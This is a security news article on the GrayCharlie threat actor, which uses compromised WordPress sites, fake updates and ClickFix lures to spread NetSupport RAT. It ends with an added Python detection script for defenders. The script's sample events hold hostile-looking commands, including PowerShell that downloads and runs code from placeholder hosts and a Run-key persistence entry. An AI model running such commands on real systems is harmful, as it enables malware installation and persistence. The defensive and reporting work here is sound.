GrayCharlie is abusing compromised WordPress websites to silently load malicious JavaScript that delivers NetSupport RAT, often followed by Stealc and SectopRAT, through fake browser updates and ClickFix lures.
Insikt Group tracks GrayCharlie as a financially motivated threat actor overlapping with SmartApeSG, active since mid-2023, that specializes in turning legitimate WordPress websites into malware-delivery points.
The actor injects links to externally hosted JavaScript into compromised pages, which then redirect visitors to fake browser-update pages or ClickFix-style social engineering flows that ultimately deliver the NetSupport RAT.
Once NetSupport is installed and connected to attacker-controlled C2 servers, GrayCharlie operators gain remote access for surveillance, file operations, and follow-on payload delivery, including the Stealc infostealer and the SectopRAT remote access malware.
Insikt Group reports that GrayCharlie operates a large, layered infrastructure footprint, concentrated heavily on the providers MivoCloud and HZ Hosting Ltd.
This includes dedicated NetSupport RAT C2 servers, staging servers hosting the malicious JavaScript templates, and higher-tier systems used to manage campaigns, often accessed via proxy services.
The group's activity remains consistent across campaigns, with recurring use of the same infection chains, license keys, and TLS certificate patterns on its C2 infrastructure.
Fake Updates, ClickFix, and Law Firms
Initially, GrayCharlie relied primarily on fake browser update overlays, which appear tailored to Chrome, Edge, or Firefox and prompt users to download a supposed update package that is actually a JavaScript-driven NetSupport installer.
The IP addresses associated with the staging infrastructure are linked to websites impersonating "Wiser College", a fictional entity used to demonstrate Wiser, a free Bootstrap HTML5 education template.
The loader script launches via WScript, stages PowerShell, downloads and extracts the NetSupport client into locations such as %AppData%, adds Registry Run keys for persistence, and then begins beaconing to GrayCharlie-controlled C2 servers.
In 2025, the actor expanded to a ClickFix flow, where compromised WordPress pages display a fake CAPTCHA that copies a PowerShell-based command to the clipboard and instructs users to execute it using the Windows Run dialog, again resulting in NetSupport RAT installation and persistence.
Most victim sites appear opportunistically compromised across many sectors, but Insikt Group also highlights a notable cluster of US law firm WordPress sites that began loading malicious JavaScript from GrayCharlie-controlled infrastructure around November 2025.
Evidence suggests these law firm sites may have been compromised via a supply-chain vector involving a shared IT or marketing provider, with SMB Crew cited as a likely avenue because its branding and shared credentials surfaced around the time the malicious infrastructure became active.
While GrayCharlie's ultimate objectives remain unclear, current telemetry points to data theft, financial gain, and potentially selling or sharing access with other threat actors, underlining the risk to legal and other high-value targets.
Mitigations
Insikt Group advises defenders to aggressively block IP addresses and domains tied to NetSupport RAT, Stealc, SectopRAT, and other tools used in GrayCharlie operations, and to treat traffic to known-compromised WordPress sites as high-risk until remediated.
The page presents a fake CAPTCHA that quietly copies a malicious command to the user's clipboard and instructs them to paste it into the Windows Run dialog (Win+R).
Security teams should deploy updated YARA, Snort, and Sigma rules to detect NetSupport components, ClickFix-style commands, and GrayCharlie's JavaScript and PowerShell loader patterns, including in historical logs.
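As an added example (not from the Insikt Group report or this article), the Python below turns the infection chain described above into host-level detection logic: WScript staging PowerShell, the Run-dialog PowerShell launch that the ClickFix lure depends on, a drop into %AppData%, and Run-key persistence. It runs over constructed Sysmon-style process-creation events; the hostnames, URLs and file names are placeholders, not indicators from the report.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (not real telemetry); the hosts,
# URLs and file names are placeholders made up for this example.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"iwr http://staging.invalid/u.zip "
                "-o $env:APPDATA\\u.zip; Expand-Archive $env:APPDATA\\u.zip $env:APPDATA\\Upd\""},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iex (iwr http://captcha.invalid/v.txt)\""},
    {"host": "ws01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /d "%APPDATA%\Upd\upd.exe"'},
    {"host": "ws03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "cmdline": "firefox.exe"},
]

PS_NAMES = {"powershell.exe", "pwsh.exe"}
HIDDEN_OR_BYPASS = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass)")
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\Run\b")
APPDATA = re.compile(r"(?i)(%APPDATA%|\$env:APPDATA)")

def base(path):
    return PureWindowsPath(path).name.lower()
def is_powershell(e):
    return base(e["image"]) in PS_NAMES

# One rule per step of the chain the article describes: WScript staging PowerShell, a Run-dialog
# (explorer.exe parent) PowerShell launch, a drop into %AppData%, and a Run-key persistence entry.
RULES = {
    "wscript_stages_powershell": lambda e: base(e["parent"]) == "wscript.exe" and is_powershell(e),
    "clickfix_run_dialog_powershell": lambda e: base(e["parent"]) == "explorer.exe"
        and is_powershell(e) and bool(HIDDEN_OR_BYPASS.search(e["cmdline"])),
    "powershell_drops_into_appdata": lambda e: is_powershell(e) and bool(APPDATA.search(e["cmdline"])),
    "run_key_persistence": lambda e: bool(RUN_KEY.search(e["cmdline"]) and APPDATA.search(e["cmdline"])),
}

def detect(events):
    """Return (host, rule_name) pairs for every event that matches a rule."""
    return [(e["host"], name) for e in events for name, cond in RULES.items() if cond(e)]

def hosts_with_chain(events, min_rules=2):
    """Hosts where at least min_rules distinct chain steps fired: a stronger signal than one hit."""
    seen = {}
    for host, rule in detect(events):
        seen.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in seen.items() if len(rules) >= min_rules)
```

Individual rules are deliberately narrow and will need tuning against a baseline; the chain-level view in `hosts_with_chain` is what separates a single odd PowerShell launch from the full loader sequence.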
Additional recommended controls include tightening email and web filtering, monitoring for suspicious data exfiltration to known malicious infrastructure, and continuously ingesting new GrayCharlie threat intelligence feeds to keep detection and blocking policies current.